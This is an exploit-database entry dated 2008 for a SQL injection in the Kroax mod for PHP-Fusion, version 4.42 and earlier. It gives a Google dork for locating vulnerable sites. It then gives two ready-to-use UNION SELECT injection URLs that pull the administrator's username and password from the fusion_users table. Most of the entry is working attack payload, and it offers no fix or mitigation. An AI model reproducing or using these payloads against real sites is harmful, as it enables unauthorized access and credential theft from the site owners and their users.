PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability

2008-06-26T00:00:00
ID 1337DAY-ID-3300
Type zdt
Reporter boom3rang
Modified 2008-06-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability
===================================================================



--- Remote SQL Injection ---

[+]Google Dork:                               inurl:"kroax.php?category" 

--------------
 Exploit
--------------

example:

www.site.com/infusions/the_kroax/kroax.php?category= [SQL]



[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


[+] password: 
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\


ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.



#  0day.today [2018-02-06]  #